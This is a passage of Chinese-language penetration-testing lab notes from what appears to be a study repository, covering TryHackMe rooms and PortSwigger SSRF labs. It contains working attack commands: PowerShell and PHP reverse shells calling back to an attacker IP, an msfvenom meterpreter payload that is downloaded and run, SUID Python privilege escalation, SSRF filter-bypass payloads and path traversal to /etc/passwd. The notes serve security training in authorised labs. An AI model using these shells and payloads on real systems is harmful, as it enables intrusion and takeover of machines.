 9 | 80/tcp   open  http
10 | 3389/tcp open  ms-wbt-server
11 | 8080/tcp open  http-proxy
12 | 
13 | Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
14 | 
15 | 
16 | #  上传一个shell，并且获得一个反弹shell
17 | powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.21.169:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.21.169 -Port 4443
18 | 
19 | 
20 | #  查找user.txt文件
21 | Get-ChildItem -Path C:\ -Recurse -Include user.txt
22 | 
23 | #  升级一个shell，以便在msf里使用
24 | msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.21.169 LPORT=4444 -f exe -o shell.exe
25 | 
26 | #  在反弹shell里面下载上面的文件
27 | powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.21.169:8000/shell.exe','shell.exe')"
28 | 
29 | 
30 | #  执行shell
31 | Start-Process "shell.exe"


--------------------------------------------------------------------------------
/靶场/TryHackMe/Anthem.md:
--------------------------------------------------------------------------------
 1 | # 免责声明
 2 | >本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用，请不要将文中使用的工具和渗透思路用于任何非法用途，对此产生的一切后果，本人不承担任何责任，也不对造成的任何误用或损害负责。
 3 | 
 4 | # 服务探测
 5 | ```
 6 | ┌──(root💀kali)-[~/tryhackme/Anthem]
 7 | └─# nmap -sV -Pn 10.10.59.87   
 8 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 9 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-17 21:19 EST
10 | Nmap scan report for 10.10.158.120
11 | Host is up (0.31s latency).
12 | Not shown: 998 filtered ports
13 | PORT     STATE SERVICE       VERSION
14 | 80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
15 | 3389/tcp open  ms-wbt-server Microsoft Terminal Services
16 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
17 | 
18 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19 | Nmap done: 1 IP address (1 host up) scanned in 71.38 seconds
20 | 
21 | ```
22 | 
23 | ## 目录爆破
24 | ```
25 | ┌──(root💀kali)-[~/dirsearch]
26 | └─# python3 dirsearch.py -e* -t 100 -u http://10.10.59.87                                                                                                                                                                          130 ⨯
27 | 
28 |   _|. _ _  _  _  _ _|_    v0.4.2
29 |  (_||| _) (/_(_|| (_| )
30 | 
31 | Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
32 | 
33 | Output File: /root/dirsearch/reports/10.10.158.120/_21-11-17_21-35-14.txt
34 | 
35 | Error Log: /root/dirsearch/logs/errors-21-11-17_21-35-14.log
36 | 
37 | Target: http://10.10.158.120/
38 | 
39 | [21:35:18] Starting:           
40 | [21:35:28] 200 -    5KB - /.aspx                                           
41 | [21:35:38] 301 -  152B  - /.vscode  ->  http://10.10.158.120/.vscode/      
42 | [21:35:48] 302 -  126B  - /Install  ->  /umbraco/                           
43 | [21:35:48] 302 -  126B  - /INSTALL  ->  /umbraco/                           
44 | [21:35:52] 403 -    2KB - /Trace.axd                                        
45 | [21:35:52] 200 -    3KB - /Search                                                    
46 | [21:37:39] 301 -  118B  - /archive  ->  /                                   
47 | [21:37:39] 301 -  118B  - /archive.aspx  ->  /                              
48 | [21:37:47] 200 -    4KB - /authors                                          
49 | [21:37:56] 400 -   46B  - /base/                                             
50 | [21:38:03] 200 -    5KB - /blog/                                             
51 | [21:38:09] 200 -    5KB - /blog                                                 
52 | [21:38:19] 200 -    3KB - /categories                                        
53 | [21:39:19] 200 -    5KB - /default.aspx                                                                     
54 | [21:40:12] 302 -  126B  - /install  ->  /umbraco/                             
55 | [21:40:12] 302 -  126B  - /install/  ->  /umbraco/                            
56 | [21:40:55] 200 -  192B  - /robots.txt                                         
57 | [21:40:56] 200 -    2KB - /rss                                                
58 | [21:40:58] 200 -    3KB - /search                                             
59 | [21:41:18] 200 -    1KB - /sitemap                                            
60 | [21:41:51] 200 -    3KB - /tags   
61 | ```


--------------------------------------------------------------------------------
/靶场/TryHackMe/Kenobi.md:
--------------------------------------------------------------------------------
 1 | # nmap 扫描
 2 | └─#  nmap -sV 10.10.157.197                                                                                                                                                                                                            255 ⨯
 3 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 04:06 EDT
 4 | Nmap scan report for 10.10.157.197
 5 | Host is up (0.33s latency).
 6 | Not shown: 993 closed ports
 7 | PORT     STATE SERVICE     VERSION
 8 | 21/tcp   open  ftp         ProFTPD 1.3.5
 9 | 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
10 | 80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
11 | 111/tcp  open  rpcbind     2-4 (RPC # 100000)
12 | 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
13 | 445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
14 | 2049/tcp open  nfs_acl     2-3 (RPC # 100227)
15 | Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
16 | 
17 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
18 | Nmap done: 1 IP address (1 host up) scanned in 19.96 seconds
19 | 
20 | 
21 | 
22 | # samba扫描
23 | └─#  nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.157.197
24 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 04:08 EDT
25 | Nmap scan report for 10.10.157.197
26 | Host is up (0.30s latency).
27 | 
28 | PORT    STATE SERVICE
29 | 445/tcp open  microsoft-ds
30 | 
31 | Host script results:
32 | | smb-enum-shares: 
33 | |   account_used: guest
34 | |   \\10.10.157.197\IPC$: 
35 | |     Type: STYPE_IPC_HIDDEN
36 | |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
37 | |     Users: 1
38 | |     Max Users: <unlimited>
39 | |     Path: C:\tmp
40 | |     Anonymous access: READ/WRITE
41 | |     Current user access: READ/WRITE
42 | |   \\10.10.157.197\anonymous: 
43 | |     Type: STYPE_DISKTREE
44 | |     Comment: 
45 | |     Users: 0
46 | |     Max Users: <unlimited>
47 | |     Path: C:\home\kenobi\share
48 | |     Anonymous access: READ/WRITE
49 | |     Current user access: READ/WRITE
50 | |   \\10.10.157.197\print$: 
51 | |     Type: STYPE_DISKTREE
52 | |     Comment: Printer Drivers
53 | |     Users: 0
54 | |     Max Users: <unlimited>
55 | |     Path: C:\var\lib\samba\printers
56 | |     Anonymous access: <none>
57 | |_    Current user access: <none>
58 | 


--------------------------------------------------------------------------------
/靶场/TryHackMe/Pickle Rick.md:
--------------------------------------------------------------------------------
 1 | # 开启服务
 2 | 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
 3 | 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 4 | 
 5 | 
 6 | # 网页源代码信息
 7 | Note to self, remember username!
 8 | 
 9 | Username: R1ckRul3s
10 | 
11 | 
12 | # 目录爆破
13 | 1，assets
14 | 2, robots.txt---->   Wubbalubbadubdub   Wubba lubba dub dub
15 | 在Rick and Morty中Rick有一句口头禅“Wubba lubba dub dub”，在鸟人语言里，这是“我很痛苦，请救救我”的意思
16 | 3,login.php 登录页面
17 | 
18 | # clue.txt
19 | Look around the file system for the other ingredient.
20 | 
21 | # 其他文件夹
22 | backups
23 | cache
24 | crash
25 | lib
26 | local
27 | lock
28 | log
29 | mail
30 | opt
31 | run
32 | snap
33 | spool
34 | tmp
35 | www
36 | 
37 | # 交互shell
38 | php -r '$sock=fsockopen("10.13.21.169",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
39 | 
40 | 
41 | cat "second ingredients"


--------------------------------------------------------------------------------
/靶场/TryHackMe/Powershell skills.md:
--------------------------------------------------------------------------------
 1 | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 基本命令# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
 2 | # 列出所有命令
 3 | Get-Command.
 4 | 
 5 | # 获取帮助
 6 | Get-Help Command-Name
 7 | 
 8 | # 从C盘根目录开始查找 interesting-file.txt 文件的目录位置
 9 | Get-ChildItem -Path C:\ -Include *interesting-file.txt* -File -Recurse -ErrorAction SilentlyContinue
10 | 
11 | # 查看文件内容
12 | Get-Content "C:\Program Files\interesting-file.txt.txt"
13 | 
14 | # 获取一个文件的md5哈希值
15 | Get-FileHash -Path "C:\Program Files\interesting-file.txt.txt" -Algorithm MD5
16 | 
17 | # 获取当前路径
18 | Get-Location
19 | 
20 | # 检查某个文件是否存在
21 | Get-Location -Path "C:\Users\Administrator\Documents\Passwords"
22 | 
23 | # 对某个文件base64解码
24 | certutil -decode "C:\Users\Administrator\Desktop\b64.txt" decode.txt
25 | 
26 | 
27 | 
28 | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 枚举机器信息# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
29 | # 枚举用户
30 | Get-LocalUser
31 | 
32 | # 判断某个sid是否属于哪个用户
33 | Get-LocalUser -SID "S-1-5-21-1394777289-3961777894-1791813945-501"
34 | 
35 | # 枚举passwd设置为false的用户
36 | Get-LocalUser | Where-Object -Property PasswordRequired -Match false
37 | 
38 | 
39 | # 枚举本地组
40 | Get-LocalGroup | measure
41 | 
42 | # 获取IP地址信息
43 | Get-NetIPAddress
44 | 
45 | # 获取监听端口
46 | GEt-NetTCPConnection | Where-Object -Property State -Match Listen | measure  # 总数
47 | GEt-NetTCPConnection | Where-Object -Property State -Match Listen    # 枚举监听端口
48 | 
49 | # 枚举补丁
50 | Get-Hotfix | measure   # 获取补丁总数
51 | Get-Hotfix   # 枚举补丁
52 | Get-Hotfix -Id KB4023834  # 查看单个补丁详细信息
53 | 
54 | 
55 | # 枚举备份文件内容
56 | Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue
57 | 
58 | 
59 | # 搜索所有包含api-key的文件
60 | Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY
61 | 
62 | # 枚举所有进程信息
63 | Get-Process
64 | 
65 | # 获取某个计划任务的路径
66 | Get-ScheduleTask -TaskName new-sched-task
67 | 
68 | # 查看C:盘的owner
69 | Get-Acl c:/
70 | 
71 | 
72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/靶场/TryHackMe/RootMe.md:
--------------------------------------------------------------------------------
 1 | # 服务发现
 2 | ```
 3 | ┌──(root💀kali)-[~]
 4 | └─#  nmap -sV -Pn 10.10.15.221                                                                                                                                                                                                         255 ⨯
 5 | Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 6 | Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 05:00 EDT
 7 | Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
 8 | SYN Stealth Scan Timing: About 51.60% done; ETC: 05:01 (0:00:11 remaining)
 9 | Nmap scan report for 10.10.15.221
10 | Host is up (0.32s latency).
11 | Not shown: 998 closed ports
12 | PORT   STATE SERVICE VERSION
13 | 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
14 | 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
15 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
16 | 
17 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
18 | Nmap done: 1 IP address (1 host up) scanned in 45.85 seconds
19 | ```
20 | 
21 | 
22 | # 目录爆破,发现上传路径/panel
23 | ```
24 | ┌──(root💀kali)-[~]
25 | └─#  gobuster dir -u 10.10.15.221 -w /usr/share/wordlists/Web-Content/directory-list-2.3-small.txt
26 | ===============================================================
27 | Gobuster v3.1.0
28 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
29 | ===============================================================
30 | [+] Url:                     http://10.10.15.221
31 | [+] Method:                  GET
32 | [+] Threads:                 10
33 | [+] Wordlist:                /usr/share/wordlists/Web-Content/directory-list-2.3-small.txt
34 | [+] Negative Status codes:   404
35 | [+] User Agent:              gobuster/3.1.0
36 | [+] Timeout:                 10s
37 | ===============================================================
38 | 2021/09/17 05:02:45 Starting gobuster in directory enumeration mode
39 | ===============================================================
40 | /uploads              (Status: 301) [Size: 314] [--> http://10.10.15.221/uploads/]
41 | /css                  (Status: 301) [Size: 310] [--> http://10.10.15.221/css/]    
42 | /js                   (Status: 301) [Size: 309] [--> http://10.10.15.221/js/]     
43 | /panel                (Status: 301) [Size: 312] [--> http://10.10.15.221/panel/] 
44 | ```
45 | 
46 | 
47 | # 上传绕过
48 | 因为apache的版本是2.4.29，存在一个一个文件解析漏洞，参考https://book.hacktricks.xyz/pentesting-web/file-upload绕过
49 | burpsuite抓包，修改filename
50 | 
51 | ```filename="1.php.\"```
52 | 
53 | # 查找所有SUID文件
54 | ```
55 | find / -user root -perm /4000
56 | 
57 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper
58 | /usr/lib/snapd/snap-confine
59 | /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
60 | /usr/lib/eject/dmcrypt-get-device
61 | /usr/lib/openssh/ssh-keysign
62 | /usr/lib/policykit-1/polkit-agent-helper-1
63 | /usr/bin/traceroute6.iputils
64 | /usr/bin/newuidmap
65 | /usr/bin/newgidmap
66 | /usr/bin/chsh
67 | /usr/bin/python
68 | /usr/bin/chfn
69 | /usr/bin/gpasswd
70 | /usr/bin/sudo
71 | /usr/bin/newgrp
72 | /usr/bin/passwd
73 | /bin/mount
74 | /bin/su
75 | /bin/fusermount
76 | /bin/ping
77 | /bin/umount
78 | ```
79 | 
80 | # 利用python提权
81 | ```
82 | python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
83 | #  id
84 | id
85 | uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
86 | #  cat /root/root.txt
87 | cat /root/root.txt
88 | THM{pr1v1l3g3_3sc4l4t10n}
89 | ```
90 | 


--------------------------------------------------------------------------------
/靶场/TryHackMe/Steel Mountain.md:
--------------------------------------------------------------------------------
 1 | # nmap 扫描
 2 | PORT      STATE SERVICE            VERSION
 3 | 80/tcp    open  http               Microsoft IIS httpd 8.5
 4 | 135/tcp   open  msrpc              Microsoft Windows RPC
 5 | 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
 6 | 445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 7 | 3389/tcp  open  ssl/ms-wbt-server?
 8 | 5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 9 | 8080/tcp  open  http               HttpFileServer httpd 2.3
10 | 47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
11 | 49152/tcp open  msrpc              Microsoft Windows RPC
12 | 49153/tcp open  msrpc              Microsoft Windows RPC
13 | 49154/tcp open  msrpc              Microsoft Windows RPC
14 | 49155/tcp open  msrpc              Microsoft Windows RPC
15 | 49156/tcp open  msrpc              Microsoft Windows RPC
16 | 49163/tcp open  msrpc              Microsoft Windows RPC
17 | 49164/tcp open  msrpc              Microsoft Windows RPC
18 | Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
19 | 


--------------------------------------------------------------------------------
/靶场/bWAPP.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/bWAPP.xmind


--------------------------------------------------------------------------------
/靶场/burp-web-path/SSRF(服务端请求伪造).md:
--------------------------------------------------------------------------------
  1 | # 是什么
  2 | 
  3 | 服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
  4 | 
  5 | 
  6 | # 攻击者可以利用 SSRF 实现的攻击主要有 5 种：
  7 | 1. 可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的 banner 信息
  8 | 2. 攻击运行在内网或本地的应用程序（比如溢出）
  9 | 3. 对内网 WEB 应用进行指纹识别，通过访问默认文件实现
 10 | 4. 攻击内外网的 web 应用，主要是使用 GET 参数就可以实现的攻击（比如 Struts2，sqli 等）
 11 | 5. 利用 file 协议读取本地文件等
 12 | 
 13 | # 协议利用
 14 | 
 15 | [hacktricks](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery)
 16 | 
 17 | 
 18 | # lab/
 19 | 
 20 | ## Common SSRF attacks
 21 | 
 22 | 1. Lab: Basic SSRF against the local server
 23 | 
 24 | 把stockApi的参数替换为http://localhost/admin，遍历接口
 25 | 
 26 | ![](SSRF(服务端请求伪造)_files/1.jpg)
 27 | 
 28 | 
 29 | 下面payload删除carlos：
 30 | 
 31 | - http://localhost/admin/delete?username=carlos
 32 | 
 33 | 2. Lab: Basic SSRF against another back-end system
 34 | 
 35 | 探测IP
 36 | 
 37 | ![](SSRF(服务端请求伪造)_files/1.jpg)
 38 | 
 39 | status=200的IP
 40 | 
 41 | ![](SSRF(服务端请求伪造)_files/2.jpg)
 42 | 
 43 | soled
 44 | 
 45 | payload为：
 46 | 
 47 | - stockApi=http://192.168.0.46:8080/admin/delete?username=carlos
 48 | 
 49 | ![](SSRF(服务端请求伪造)_files/3.jpg)
 50 | 
 51 | 
 52 | ## Circumventing common SSRF defenses（绕过一般的 SSRF 防御系统）
 53 | 
 54 | - 使用 127.0.0.1 的其他 IP 表示法，例如 2130706433、017700000001 或 127.1。
 55 | - 注册解析到 127.0.0.1 的自己的域名。为此，您可以使用 spoofed.burpcollaborator.net。
 56 | - 使用 URL 编码或大小写变化混淆被拦截的字符串。
 57 | - Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an http: to https: URL during the redirect has been shown to bypass some anti-SSRF filters.
 58 | 
 59 | 1. Lab: SSRF with blacklist-based input filter
 60 | 
 61 | 用```http://127.1/```代替```http://localhost/```
 62 | 用```%2561```替换字母a绕过防护
 63 | 
 64 | ![](SSRF(服务端请求伪造)_files/1.jpg)
 65 | 
 66 | 
 67 | ###白名单绕过
 68 | 
 69 | - 使用@字符。如：https://expected-host:fakepassword@evil-host
 70 | - 使用#字符。如：https://evil-host#expected-host
 71 | - 利用 DNS 命名层次结构 ，如：https://expected-host.evil-host
 72 | - URL编码绕过
 73 | - 联合以上各种技术绕过
 74 | 
 75 | ### 通过开放重定向绕过 SSRF 过滤器
 76 | 
 77 | 如果参数中包含一个重定向的参数，也可以利用，比如：
 78 | 
 79 | - /product/nextProduct?currentProductId=6&path=http://evil-user.net
 80 | 利用开放重定向漏洞来绕过 URL 过滤器，并利用 SSRF 漏洞如下
 81 | 
 82 | ```
 83 | POST /product/stock HTTP/1.0
 84 | Content-Type: application/x-www-form-urlencoded
 85 | Content-Length: 118
 86 | 
 87 | stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
 88 | ```
 89 | 
 90 | 这个 SSRF 漏洞之所以能够工作，是因为应用程序首先验证提供的 stockAPI URL 是否位于允许的域上
 91 | 
 92 | 2. Lab: SSRF with filter bypass via open redirection vulnerability
 93 | 
 94 | payload为：
 95 | ```
 96 | /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
 97 | ```
 98 | 
 99 | ![](SSRF(服务端请求伪造)_files/1.jpg)
100 | 
101 | 
102 | ## Blind SSRF vulnerabilities(盲注SSRF)
103 | 
104 | 向外部机器发http请求，看是否被访问验证ssrf存在
105 | 
106 | payload:
107 | - http://<kali IP>:80/any
108 | 
109 | 本地开一个python web服务监听，看有没有被访问
110 | 
111 | 
112 | ## Finding hidden attack surface for SSRF vulnerabilities（寻找隐藏的SSRF）
113 | 
114 | 1. 某一可能被当做url的参数（有时，应用程序在请求参数中只输入主机名或 URL 路径的一部分。 提交的值随后会被服务器端整合到请求的完整 URL 中）
115 | 2. XML（有些应用程序传输数据时使用的格式规范允许包含数据解析器可能会请求的 URL）
116 | 3. Referer （有些应用程序使用服务器端分析软件来跟踪访问者。 这种软件通常会记录请求中的 Referer 标头，以便跟踪传入链接）
117 | 
118 | 


--------------------------------------------------------------------------------
/靶场/burp-web-path/Server-side vulnerabilities（服务器端漏洞）.md:
--------------------------------------------------------------------------------
 1 | # 路径遍历
 2 | 
 3 | 这些漏洞可使攻击者在运行应用程序的服务器上读取任意文件。 这可能包括：
 4 | 1. 应用程序代码和数据。
 5 | 2. 后端系统的凭证。
 6 | 3. 敏感的操作系统文件
 7 | 
 8 | 在某些情况甚至可以任意写文件
 9 | 
10 | 
11 | 可能存在路径遍历的点：
12 | 
13 | 如果一个路径如：
14 | ```
15 | <img src="/loadImage?filename=218.png">
16 | ```
17 | 
18 | 或者
19 | ```
20 | https://insecure-website.com/loadImage?filename=../../../etc/passwd
21 | ```
22 | 
23 | # 访问控制
24 | 
25 | 作用：
26 | 1. 用户身份确认
27 | 2. Session管理
28 | 3. 控制操作
29 | 
30 | 
31 | ## Unprotected functionality
32 | 
33 | 1. 没有做session管理的管理页面，如普通用户可以直接访问/admin
34 | 2. 网页代码里泄露的管理界面url
35 | ```
36 | <script>
37 | 	var isAdmin = false;
38 | 	if (isAdmin) {
39 | 		...
40 | 		var adminPanelTag = document.createElement('a');
41 | 		adminPanelTag.setAttribute('https://insecure-website.com/administrator-panel-yb556');
42 | 		adminPanelTag.innerText = 'Admin panel';
43 | 		...
44 | 	}
45 | </script>
46 | ```
47 | 
48 | ### 垂直权限提升
49 | 基于参数的访问控制方法
50 | 
51 | 如：
52 | ```
53 | https://insecure-website.com/login/home.jsp?admin=true
54 | https://insecure-website.com/login/home.jsp?role=1
55 | ```
56 | 
57 | ### 水平权限提升
58 | 
59 | 类似于上面的方法：
60 | ```
61 | https://insecure-website.com/myaccount?id=123
62 | ```


--------------------------------------------------------------------------------
/靶场/kali.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/kali.xmind


--------------------------------------------------------------------------------
/靶场/pikachu.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/pikachu.xmind


--------------------------------------------------------------------------------
/靶场/sqli-lab.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/sqli-lab.xmind


--------------------------------------------------------------------------------
/靶场/upload-labs.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/upload-labs.xmind


--------------------------------------------------------------------------------
/靶场/xss-labs.xmind:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/靶场/xss-labs.xmind


--------------------------------------------------------------------------------